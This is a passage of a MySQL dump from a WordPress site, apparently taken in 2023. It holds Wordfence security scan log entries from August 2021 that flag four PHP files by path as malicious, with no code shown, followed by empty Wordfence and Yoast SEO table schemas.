wp-admin/js/index.php'),(3089,1629422068.569266,10,'info','SUM_ENDBAD:Scanning file contents for infections and vulnerabilities'),(3090,1629422068.594343,10,'info','SUM_ENDOK:Scanning file contents for URLs on a domain blocklist'),(3091,1629422068.638748,10,'info','SUM_START:Scanning for publicly accessible quarantined files'),(3092,1629422068.666560,10,'info','SUM_ENDOK:Scanning for publicly accessible quarantined files'),(3093,1629422068.741021,10,'info','SUM_START:Scanning posts for URLs on a domain blocklist'),(3094,1629422069.032162,2,'info','Examining URLs found in posts we scanned for dangerous websites'),(3095,1629422069.065108,2,'info','Checking 181 host keys against Wordfence scanning servers.'),(3096,1629422069.693479,2,'info','Done host key check.'),(3097,1629422069.703732,2,'info','Done examining URLs'),(3098,1629422069.889450,10,'info','SUM_ENDOK:Scanning posts for URLs on a domain blocklist'),(3099,1629422069.928935,10,'info','SUM_START:Scanning comments for URLs on a domain blocklist'),(3100,1629422070.999481,10,'info','SUM_ENDOK:Scanning comments for URLs on a domain blocklist'),(3101,1629422071.046741,10,'info','SUM_START:Scanning for weak passwords'),(3102,1629422071.094189,2,'info','Starting password strength check on 1 user.'),(3103,1629422071.237966,10,'info','SUM_ENDOK:Scanning for weak passwords'),(3104,1629422071.258983,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(3105,1629422073.544493,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(3106,1629422073.657410,10,'info','SUM_START:Scanning for admin users not created through WordPress'),(3107,1629422074.260168,10,'info','SUM_ENDOK:Scanning for admin users not created through WordPress'),(3108,1629422074.338689,10,'info','SUM_START:Scanning for suspicious site options'),(3109,1629422074.545196,2,'info','Examining URLs found in the options we scanned for dangerous websites'),(3110,1629422074.899232,2,'info','Done examining URLs'),(3111,1629422075.379524,10,'info','SUM_ENDOK:Scanning for suspicious site options'),(3112,1629422075.467089,1,'info','-------------------'),(3113,1629422075.477712,2,'info','Wordfence used 10 MB of memory for scan. Server peak memory usage was: 28 MB'),(3114,1629422075.488425,1,'info','Scan Complete. Scanned 4475 files, 7 plugins, 11 themes, 26 posts, 0 comments and 317 URLs in 4 minutes 6 seconds.'),(3115,1629422075.499028,10,'info','SUM_FINAL:Scan complete. You have 21 new issues to fix. See below.'),(3116,1629458035.246713,10,'info','SUM_PREP:Preparing a new scan.'),(3117,1629458035.251890,1,'info','Initiating quick scan'),(3118,1629458035.256568,10,'info','SUM_START:Checking Web Application Firewall status'),(3119,1629458035.258514,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(3120,1629458035.276329,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(3121,1629458035.526209,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(3122,1629458035.549097,1,'info','-------------------'),(3123,1629458035.570220,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 18 MB'),(3124,1629458035.573077,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(3125,1629458035.583490,10,'info','SUM_FINAL:Scan complete. You have 15 new issues to fix. See below.'),(3126,1629544480.544140,10,'info','SUM_PREP:Preparing a new scan.'),(3127,1629544480.599880,1,'info','Initiating quick scan'),(3128,1629544480.631123,10,'info','SUM_START:Checking Web Application Firewall status'),(3129,1629544480.641666,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(3130,1629544480.712489,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(3131,1629544482.950937,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(3132,1629544482.967072,1,'info','-------------------'),(3133,1629544482.974011,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 18 MB'),(3134,1629544482.986180,1,'info','Quick Scan Complete. Scanned in 2 seconds.'),(3135,1629544482.998281,10,'info','SUM_FINAL:Scan complete. You have 15 new issues to fix. See below.'),(3136,1629631288.214986,10,'info','SUM_PREP:Preparing a new scan.'),(3137,1629631288.521767,1,'info','Initiating quick scan'),(3138,1629631288.569308,10,'info','SUM_START:Checking Web Application Firewall status'),(3139,1629631288.574328,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(3140,1629631288.626988,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(3141,1629631288.940717,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(3142,1629631289.055906,1,'info','-------------------'),(3143,1629631289.098679,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 18 MB'),(3144,1629631289.120070,1,'info','Quick Scan Complete. Scanned in 1 second.'),(3145,1629631289.140085,10,'info','SUM_FINAL:Scan complete. You have 15 new issues to fix. See below.'),(3146,1629680873.442618,1,'info','Scheduled Wordfence scan starting at Monday 23rd of August 2021 01:07:53 AM'),(3147,1629680874.012434,10,'info','SUM_PREP:Preparing a new scan.'),(3148,1629680874.068889,1,'info','Contacting Wordfence to initiate scan'),(3149,1629680875.134892,10,'info','SUM_PAIDONLY:Check if your site is being Spamvertized is for paid members only'),(3150,1629680877.175002,10,'info','SUM_PAIDONLY:Checking if your IP is generating spam is for paid members only'),(3151,1629680879.224336,10,'info','SUM_PAIDONLY:Checking if your site is on a domain blocklist is for paid members only'),(3152,1629680881.277130,10,'info','SUM_START:Checking for the most secure way to get IPs'),(3153,1629680883.457841,10,'info','SUM_ENDOK:Checking for the most secure way to get IPs'),(3154,1629680883.485710,10,'info','SUM_START:Scanning to check available disk space'),(3155,1629680883.495359,2,'info','Total disk space: 3.58 TB -- Free disk space: 3.3 TB'),(3156,1629680883.499199,2,'info','The disk has 3464238.68 MB available'),(3157,1629680883.507401,10,'info','SUM_ENDOK:Scanning to check available disk space'),(3158,1629680883.532189,10,'info','SUM_START:Checking Web Application Firewall status'),(3159,1629680883.546548,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(3160,1629680883.601520,10,'info','SUM_START:Checking for future GeoIP support'),(3161,1629680883.611857,10,'info','SUM_ENDOK:Checking for future GeoIP support'),(3162,1629680883.642821,10,'info','SUM_START:Checking for paths skipped due to scan settings'),(3163,1629680883.667449,10,'info','SUM_ENDBAD:Checking for paths skipped due to scan settings'),(3164,1629680883.684659,2,'info','Getting plugin list from WordPress'),(3165,1629680883.724901,2,'info','Found 6 plugins'),(3166,1629680883.727677,2,'info','Getting theme list from WordPress'),(3167,1629680883.763868,2,'info','Found 11 themes'),(3168,1629680884.018163,10,'info','SUM_START:Fetching core, theme and plugin file signatures from Wordfence'),(3169,1629680885.448742,10,'info','SUM_ENDSUCCESS:Fetching core, theme and plugin file signatures from Wordfence'),(3170,1629680885.511508,10,'info','SUM_START:Fetching list of known malware files from Wordfence'),(3171,1629680885.515458,10,'info','SUM_ENDSUCCESS:Fetching list of known malware files from Wordfence'),(3172,1629680885.531598,10,'info','SUM_START:Fetching list of known core files from Wordfence'),(3173,1629680885.542452,10,'info','SUM_ENDSUCCESS:Fetching list of known core files from Wordfence'),(3174,1629680885.553243,10,'info','SUM_START:Comparing core WordPress files against originals in repository'),(3175,1629680885.559686,10,'info','SUM_DISABLED:Skipping theme scan'),(3176,1629680885.561737,10,'info','SUM_DISABLED:Skipping plugin scan'),(3177,1629680885.579147,10,'info','SUM_START:Scanning for known malware files'),(3178,1629680885.603463,10,'info','SUM_START:Scanning for unknown files in wp-admin and wp-includes'),(3179,1629680885.648220,2,'info','500 files indexed'),(3180,1629680885.711678,2,'info','1000 files indexed'),(3181,1629680885.787377,2,'info','1500 files indexed'),(3182,1629680885.842979,2,'info','2000 files indexed'),(3183,1629680885.950564,2,'info','2500 files indexed'),(3184,1629680886.006581,2,'info','3000 files indexed'),(3185,1629680886.062662,2,'info','3500 files indexed'),(3186,1629680886.112172,2,'info','4000 files indexed'),(3187,1629680886.160059,2,'info','4475 files indexed'),(3188,1629680890.016843,2,'info','Analyzed 100 files containing 1.65 MB of data so far'),(3189,1629680894.075176,2,'info','Analyzed 200 files containing 3.22 MB of data so far'),(3190,1629680899.705807,2,'info','Analyzed 300 files containing 4.52 MB of data so far'),(3191,1629680903.415175,2,'info','Analyzed 400 files containing 7.21 MB of data so far'),(3192,1629680906.243897,2,'info','Analyzed 500 files containing 8.07 MB of data so far'),(3193,1629680910.585300,2,'info','Analyzed 600 files containing 8.93 MB of data so far'),(3194,1629680914.478847,2,'info','Analyzed 700 files containing 11.05 MB of data so far'),(3195,1629680917.731077,2,'info','Analyzed 800 files containing 12.36 MB of data so far'),(3196,1629680920.758624,2,'info','Analyzed 900 files containing 13.31 MB of data so far'),(3197,1629680924.740741,2,'info','Analyzed 1000 files containing 15.06 MB of data so far'),(3198,1629680928.918709,2,'info','Analyzed 1100 files containing 20.48 MB of data so far'),(3199,1629680932.297900,2,'info','Analyzed 1200 files containing 22.09 MB of data so far'),(3200,1629680934.536119,2,'info','Analyzed 1300 files containing 23.26 MB of data so far'),(3201,1629680936.596618,2,'info','Analyzed 1400 files containing 24 MB of data so far'),(3202,1629680940.012093,2,'info','Analyzed 1500 files containing 24.95 MB of data so far'),(3203,1629680944.356661,2,'info','Analyzed 1600 files containing 24.98 MB of data so far'),(3204,1629680947.637270,2,'info','Analyzed 1700 files containing 25.02 MB of data so far'),(3205,1629680950.857628,2,'info','Analyzed 1800 files containing 26.21 MB of data so far'),(3206,1629680955.781063,2,'info','Analyzed 1900 files containing 26.64 MB of data so far'),(3207,1629680958.787098,2,'info','Analyzed 2000 files containing 27.12 MB of data so far'),(3208,1629680961.825406,2,'info','Analyzed 2100 files containing 27.38 MB of data so far'),(3209,1629680964.894309,2,'info','Analyzed 2200 files containing 30.33 MB of data so far'),(3210,1629680968.392883,2,'info','Analyzed 2300 files containing 34.59 MB of data so far'),(3211,1629680972.560670,2,'info','Analyzed 2400 files containing 37.16 MB of data so far'),(3212,1629680975.111159,2,'info','Analyzed 2500 files containing 37.95 MB of data so far'),(3213,1629680978.948082,2,'info','Analyzed 2600 files containing 40.05 MB of data so far'),(3214,1629680982.989037,2,'info','Analyzed 2700 files containing 41.66 MB of data so far'),(3215,1629680987.552533,2,'info','Analyzed 2800 files containing 43.31 MB of data so far'),(3216,1629680991.048793,2,'info','Analyzed 2900 files containing 46.73 MB of data so far'),(3217,1629680993.780698,2,'info','Analyzed 3000 files containing 47.75 MB of data so far'),(3218,1629680997.024283,2,'info','Analyzed 3100 files containing 49 MB of data so far'),(3219,1629681000.446560,2,'info','Analyzed 3200 files containing 49.83 MB of data so far'),(3220,1629681003.978184,2,'info','Analyzed 3300 files containing 53.27 MB of data so far'),(3221,1629681006.310271,2,'info','Analyzed 3400 files containing 53.98 MB of data so far'),(3222,1629681009.902193,2,'info','Analyzed 3500 files containing 55.58 MB of data so far'),(3223,1629681013.551775,2,'info','Analyzed 3600 files containing 58.57 MB of data so far'),(3224,1629681017.664149,2,'info','Analyzed 3700 files containing 60.46 MB of data so far'),(3225,1629681022.209297,2,'info','Analyzed 3800 files containing 62.07 MB of data so far'),(3226,1629681025.789901,2,'info','Analyzed 3900 files containing 72.78 MB of data so far'),(3227,1629681028.891351,2,'info','Analyzed 4000 files containing 76.32 MB of data so far'),(3228,1629681032.825383,2,'info','Analyzed 4100 files containing 78.56 MB of data so far'),(3229,1629681036.411784,2,'info','Analyzed 4200 files containing 81.45 MB of data so far'),(3230,1629681039.930705,2,'info','Analyzed 4300 files containing 84.41 MB of data so far'),(3231,1629681044.600696,2,'info','Analyzed 4400 files containing 85.45 MB of data so far'),(3232,1629681047.460724,2,'info','Analyzed 4475 files containing 86.88 MB of data.'),(3233,1629681047.480483,10,'info','SUM_ENDOK:Comparing core WordPress files against originals in repository'),(3234,1629681047.551921,10,'info','SUM_ENDBAD:Scanning for unknown files in wp-admin and wp-includes'),(3235,1629681047.631526,10,'info','SUM_ENDOK:Scanning for known malware files'),(3236,1629681047.705181,10,'info','SUM_START:Check for publicly accessible configuration files, backup files and logs'),(3237,1629681048.197895,10,'info','SUM_ENDOK:Check for publicly accessible configuration files, backup files and logs'),(3238,1629681048.339250,10,'info','SUM_START:Scanning file contents for infections and vulnerabilities'),(3239,1629681048.427716,10,'info','SUM_START:Scanning file contents for URLs on a domain blocklist'),(3240,1629681049.887708,2,'info','Starting scan of file contents'),(3241,1629681050.954014,2,'info','Scanned contents of 42 additional files at 40.48 per second'),(3242,1629681051.982890,2,'info','Scanned contents of 48 additional files at 23.23 per second'),(3243,1629681053.008337,2,'info','Scanned contents of 103 additional files at 33.31 per second'),(3244,1629681054.019396,2,'info','Scanned contents of 118 additional files at 28.76 per second'),(3245,1629681055.051769,2,'info','Scanned contents of 159 additional files at 30.96 per second'),(3246,1629681056.072111,2,'info','Scanned contents of 190 additional files at 30.87 per second'),(3247,1629681056.178692,2,'info','Scanned contents of 192 additional files at 30.66 per second'),(3248,1629681056.190026,2,'info','Asking Wordfence to check URLs against malware list.'),(3249,1629681056.202564,2,'info','Checking 229 host keys against Wordfence scanning servers.'),(3250,1629681056.812231,2,'info','Done host key check.'),(3251,1629681057.549667,2,'info','Done file contents scan'),(3252,1629681057.560309,2,'info','Adding issue: File appears to be malicious or unsafe: wp-content/themes/doctors/core/contents/part_footer/part_footer/index.php'),(3253,1629681057.564585,2,'info','Adding issue: File appears to be malicious or unsafe: wp-content/themes/doctors/core/contents/loop_attachment/loop_attachment/index.php'),(3254,1629681057.577045,2,'info','Adding issue: File appears to be malicious or unsafe: wp-content/themes/doctors/core/contents/loop_author/loop_author/index.php'),(3255,1629681057.589648,2,'info','Adding issue: File appears to be malicious or unsafe: wp-admin/js/index.php'),(3256,1629681057.610408,10,'info','SUM_ENDBAD:Scanning file contents for infections and vulnerabilities'),(3257,1629681057.642512,10,'info','SUM_ENDOK:Scanning file contents for URLs on a domain blocklist'),(3258,1629681057.678105,10,'info','SUM_START:Scanning for publicly accessible quarantined files'),(3259,1629681057.724590,10,'info','SUM_ENDOK:Scanning for publicly accessible quarantined files'),(3260,1629681057.735631,10,'info','SUM_START:Scanning posts for URLs on a domain blocklist'),(3261,1629681057.906779,2,'info','Examining URLs found in posts we scanned for dangerous websites'),(3262,1629681057.931989,2,'info','Checking 181 host keys against Wordfence scanning servers.'),(3263,1629681058.541896,2,'info','Done host key check.'),(3264,1629681058.553807,2,'info','Done examining URLs'),(3265,1629681058.704439,10,'info','SUM_ENDOK:Scanning posts for URLs on a domain blocklist'),(3266,1629681058.768985,10,'info','SUM_START:Scanning comments for URLs on a domain blocklist'),(3267,1629681059.095471,10,'info','SUM_ENDOK:Scanning comments for URLs on a domain blocklist'),(3268,1629681059.186142,10,'info','SUM_START:Scanning for weak passwords'),(3269,1629681059.230840,2,'info','Starting password strength check on 1 user.'),(3270,1629681059.343147,10,'info','SUM_ENDOK:Scanning for weak passwords'),(3271,1629681059.381378,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(3272,1629681062.711105,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(3273,1629681062.724525,10,'info','SUM_START:Scanning for admin users not created through WordPress'),(3274,1629681063.348062,10,'info','SUM_ENDOK:Scanning for admin users not created through WordPress'),(3275,1629681063.435209,10,'info','SUM_START:Scanning for suspicious site options'),(3276,1629681063.579981,2,'info','Examining URLs found in the options we scanned for dangerous websites'),(3277,1629681063.590446,2,'info','Done examining URLs'),(3278,1629681063.763822,10,'info','SUM_ENDOK:Scanning for suspicious site options'),(3279,1629681063.786655,1,'info','-------------------'),(3280,1629681063.788767,2,'info','Wordfence used 15.09 MB of memory for scan. Server peak memory usage was: 33.09 MB'),(3281,1629681063.790663,1,'info','Scan Complete. Scanned 4475 files, 7 plugins, 11 themes, 26 posts, 0 comments and 317 URLs in 3 minutes 8 seconds.'),(3282,1629681063.792446,10,'info','SUM_FINAL:Scan complete. You have 21 new issues to fix. See below.'),(3283,1629717529.862810,10,'info','SUM_PREP:Preparing a new scan.'),(3284,1629717529.879625,1,'info','Initiating quick scan'),(3285,1629717529.889616,10,'info','SUM_START:Checking Web Application Firewall status'),(3286,1629717529.897618,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(3287,1629717529.914679,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(3288,1629717530.201036,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(3289,1629717530.230597,1,'info','-------------------'),(3290,1629717530.252319,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 18 MB'),(3291,1629717530.263031,1,'info','Quick Scan Complete. Scanned in 1 second.'),(3292,1629717530.273689,10,'info','SUM_FINAL:Scan complete. You have 15 new issues to fix. See below.');
/*!40000 ALTER TABLE `wp_wfstatus` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wftrafficrates`
--
DROP TABLE IF EXISTS `wp_wftrafficrates`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wftrafficrates` (
`eMin` int(10) unsigned NOT NULL,
`IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
`hitType` enum('hit','404') NOT NULL DEFAULT 'hit',
`hits` int(10) unsigned NOT NULL,
PRIMARY KEY (`eMin`,`IP`,`hitType`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wftrafficrates`
--
LOCK TABLES `wp_wftrafficrates` WRITE;
/*!40000 ALTER TABLE `wp_wftrafficrates` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wftrafficrates` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_yoast_indexable`
--
DROP TABLE IF EXISTS `wp_yoast_indexable`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_yoast_indexable` (
`id` int(11) unsigned NOT NULL AUTO_INCREMENT,
`permalink` longtext DEFAULT NULL,
`permalink_hash` varchar(40) DEFAULT NULL,
`object_id` int(11) unsigned DEFAULT NULL,
`object_type` varchar(32) NOT NULL,
`object_sub_type` varchar(32) DEFAULT NULL,
`author_id` int(11) unsigned DEFAULT NULL,
`post_parent` int(11) unsigned DEFAULT NULL,
`title` text DEFAULT NULL,
`description` mediumtext DEFAULT NULL,
`breadcrumb_title` text DEFAULT NULL,
`post_status` varchar(20) DEFAULT NULL,
`is_public` tinyint(1) DEFAULT NULL,
`is_protected` tinyint(1) DEFAULT 0,
`has_public_posts` tinyint(1) DEFAULT NULL,
`number_of_pages` int(11) unsigned DEFAULT NULL,
`canonical` longtext DEFAULT NULL,
`primary_focus_keyword` varchar(191) DEFAULT NULL,
`primary_focus_keyword_score` int(3) DEFAULT NULL,
`readability_score` int(3) DEFAULT NULL,
`is_cornerstone` tinyint(1) DEFAULT 0,
`is_robots_noindex` tinyint(1) DEFAULT 0,
`is_robots_nofollow` tinyint(1) DEFAULT 0,
`is_robots_noarchive` tinyint(1) DEFAULT 0,
`is_robots_noimageindex` tinyint(1) DEFAULT 0,
`is_robots_nosnippet` tinyint(1) DEFAULT 0,
`twitter_title` text DEFAULT NULL,
`twitter_image` longtext DEFAULT NULL,
`twitter_description` longtext DEFAULT NULL,
`twitter_image_id` varchar(191) DEFAULT NULL,
`twitter_image_source` text DEFAULT NULL,
`open_graph_title` text DEFAULT NULL,
`open_graph_description` longtext DEFAULT NULL,
`open_graph_image` longtext DEFAULT NULL,
`open_graph_image_id` varchar(191) DEFAULT NULL,
`open_graph_image_source` text DEFAULT NULL,
`open_graph_image_meta` mediumtext DEFAULT NULL,
`link_count` int(11) DEFAULT NULL,
`incoming_link_count` int(11) DEFAULT NULL,
`prominent_words_version` int(11) unsigned DEFAULT NULL,
`created_at` datetime DEFAULT NULL,
`updated_at` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp(),
`blog_id` bigint(20) NOT NULL DEFAULT 1,
`language` varchar(32) DEFAULT NULL,
`region` varchar(32) DEFAULT NULL,
`schema_page_type` varchar(64) DEFAULT NULL,
`schema_article_type` varchar(64) DEFAULT NULL,
`has_ancestors` tinyint(1) DEFAULT 0,
PRIMARY KEY (`id`),
KEY `object_type_and_sub_type` (`object_type`,`object_sub_type`),
KEY `object_id_and_type` (`object_id`,`object_type`),
KEY `permalink_hash_and_object_type` (`permalink_hash`,`object_type`),
KEY `subpages` (`post_parent`,`object_type`,`post_status`,`object_id`),
KEY `prominent_words` (`prominent_words_version`,`object_type`,`object_sub_type`,`post_status`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_yoast_indexable`
--
LOCK TABLES `wp_yoast_indexable` WRITE;
/*!40000 ALTER TABLE `wp_yoast_indexable` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_yoast_indexable` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_yoast_indexable_hierarchy`
--
DROP TABLE IF EXISTS `wp_yoast_indexable_hierarchy`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_yoast_indexable_hierarchy` (
`indexable_id` int(11) unsigned NOT NULL DEFAULT 0,
`ancestor_id` int(11) unsigned NOT NULL DEFAULT 0,
`depth` int(11) unsigned DEFAULT NULL,
`blog_id` bigint(20) NOT NULL DEFAULT 1,
PRIMARY KEY (`indexable_id`,`ancestor_id`),
KEY `indexable_id` (`indexable_id`),
KEY `ancestor_id` (`ancestor_id`),
KEY `depth` (`depth`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_yoast_indexable_hierarchy`
--
LOCK TABLES `wp_yoast_indexable_hierarchy` WRITE;
/*!40000 ALTER TABLE `wp_yoast_indexable_hierarchy` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_yoast_indexable_hierarchy` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_yoast_migrations`
--
DROP TABLE IF EXISTS `wp_yoast_migrations`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_yoast_migrations` (
`id` int(11) unsigned NOT NULL AUTO_INCREMENT,
`version` varchar(191) DEFAULT NULL,
PRIMARY KEY (`id`),
UNIQUE KEY `wp_yoast_migrations_version` (`version`)
) ENGINE=InnoDB AUTO_INCREMENT=19 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_yoast_migrations`
--
LOCK TABLES `wp_yoast_migrations` WRITE;
/*!40000 ALTER TABLE `wp_yoast_migrations` DISABLE KEYS */;
INSERT INTO `wp_yoast_migrations` VALUES (1,'20171228151840'),(2,'20171228151841'),(3,'20190529075038'),(4,'20191011111109'),(5,'20200408101900'),(6,'20200420073606'),(7,'20200428123747'),(8,'20200428194858'),(9,'20200429105310'),(10,'20200430075614'),(11,'20200430150130'),(12,'20200507054848'),(13,'20200513133401'),(14,'20200609154515'),(15,'20200616130143'),(16,'20200617122511'),(17,'20200702141921'),(18,'20200728095334');
/*!40000 ALTER TABLE `wp_yoast_migrations` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_yoast_primary_term`
--
DROP TABLE IF EXISTS `wp_yoast_primary_term`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_yoast_primary_term` (
`id` int(11) unsigned NOT NULL AUTO_INCREMENT,
`post_id` int(11) unsigned NOT NULL,
`term_id` int(11) unsigned NOT NULL,
`taxonomy` varchar(32) NOT NULL,
`created_at` datetime DEFAULT NULL,
`updated_at` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp(),
`blog_id` bigint(20) NOT NULL DEFAULT 1,
PRIMARY KEY (`id`),
KEY `post_taxonomy` (`post_id`,`taxonomy`),
KEY `post_term` (`post_id`,`term_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_yoast_primary_term`
--
LOCK TABLES `wp_yoast_primary_term` WRITE;
/*!40000 ALTER TABLE `wp_yoast_primary_term` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_yoast_primary_term` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_yoast_seo_links`
--
DROP TABLE IF EXISTS `wp_yoast_seo_links`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_yoast_seo_links` (
`id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`url` varchar(255) DEFAULT NULL,
`post_id` bigint(20) unsigned DEFAULT NULL,
`target_post_id` bigint(20) unsigned DEFAULT NULL,
`type` varchar(8) DEFAULT NULL,
`indexable_id` int(11) unsigned DEFAULT NULL,
`target_indexable_id` int(11) unsigned DEFAULT NULL,
`height` int(11) unsigned DEFAULT NULL,
`width` int(11) unsigned DEFAULT NULL,
`size` int(11) unsigned DEFAULT NULL,
`language` varchar(32) DEFAULT NULL,
`region` varchar(32) DEFAULT NULL,
PRIMARY KEY (`id`),
KEY `link_direction` (`post_id`,`type`),
KEY `indexable_link_direction` (`indexable_id`,`type`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_yoast_seo_links`
--
LOCK TABLES `wp_yoast_seo_links` WRITE;
/*!40000 ALTER TABLE `wp_yoast_seo_links` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_yoast_seo_links` ENABLE KEYS */;
UNLOCK TABLES;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;
/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;
-- Dump completed on 2023-02-01 0:13:34